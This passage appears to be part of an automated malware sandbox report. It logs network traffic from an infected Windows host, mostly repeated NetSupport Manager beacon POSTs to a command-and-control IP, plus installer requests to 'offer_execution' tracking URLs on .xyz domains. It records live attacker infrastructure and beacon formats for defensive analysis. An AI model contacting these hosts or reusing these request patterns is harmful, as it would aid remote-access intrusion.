                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:01.359792948 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:01.459819078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:01.560600996 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:01.660621881 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:01.761604071 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:01.862585068 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:01.962723970 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:02.062876940 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:02.162643909 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:02.363658905 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:02.482268095 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:02.581585884 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:02.682667971 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:02.783543110 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:03.144423008 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:03.245533943 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:03.345549107 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:03.446526051 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:03.546642065 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:04.990561962 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:05.090589046 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:05.191586971 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:05.292680025 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:05.393606901 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:05.493655920 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:05.594559908 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:05.695583105 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:05.796530962 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:05.896534920 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:05.997515917 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:06.097513914 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:06.198545933 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:06.298538923 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:06.399533033 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:06.499530077 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:06.599602938 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:06.699525118 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:06.800549030 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:06.901526928 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:07.001691103 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:07.101541042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:07.202539921 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:07.302618980 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:07.403599977 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:07.503554106 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:07.604547977 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:07.704513073 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:07.804512024 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:07.905515909 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:08.006650925 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:08.107649088 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:08.208527088 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:08.308526993 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:08.409548998 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:08.509516001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:08.610619068 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:08.710510015 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:08.810662985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:08.911530972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:09.011562109 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        4192.168.2.549727104.21.90.147801992C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.917646885 CET198OUTGET /track_inl2.php?tim=1701869569&poid=2598&p=1.25 HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Inno Setup 6.2.2
                                                                                                                                                                                                                                                                        Host: send.planewool.xyz
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.771269083 CET654INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TZ3D9WnYWsZ1MtgxUI7%2FwOLIzZDHFPOVzFFSGUllnCZYCQktuI6XjoE5H5Ded9%2BtsvUpt6PcxHpnVLRKqgOKllbT7Pn2KybGtKu5HzcE9S7NkrtabpVNgv5myoNPE03JzWUTOJU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8314e667bd3a3b90-IAD
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        Data Raw: 33 0d 0a 6f 6b 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 3ok
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.771294117 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        5192.168.2.549729172.67.198.151801992C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:20.874691963 CET236OUTGET /ar.php?d=inno&r=offer_execution&rk=yes&o=1627&a=2598&dn=286&spot=1&t=1701869569 HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Inno Setup 6.2.2
                                                                                                                                                                                                                                                                        Host: false.apparelsilver.xyz
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.014807940 CET654INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                        Content-Length: 2
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wz55zPBU2YwWzmIibnFRsl8FrUXEIlO6JQS%2Fh%2B2fOUxNBcDsA759aHik%2BiiV1eGX5xTKdkNq%2BZA5RMh6gIYGAKxBXyErP0G1gY7FVR7mSI7eDVG82ibdhGBfLsCyJAHoMfJpGcA56KnyGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8314e66db91d07dd-IAD
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        Data Raw: 6f 6b
                                                                                                                                                                                                                                                                        Data Ascii: ok
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:43.865945101 CET234OUTGET /ar.php?d=inno&r=offer_execution&rk=no&o=331&a=2598&dn=244&spot=2&t=1701869569 HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
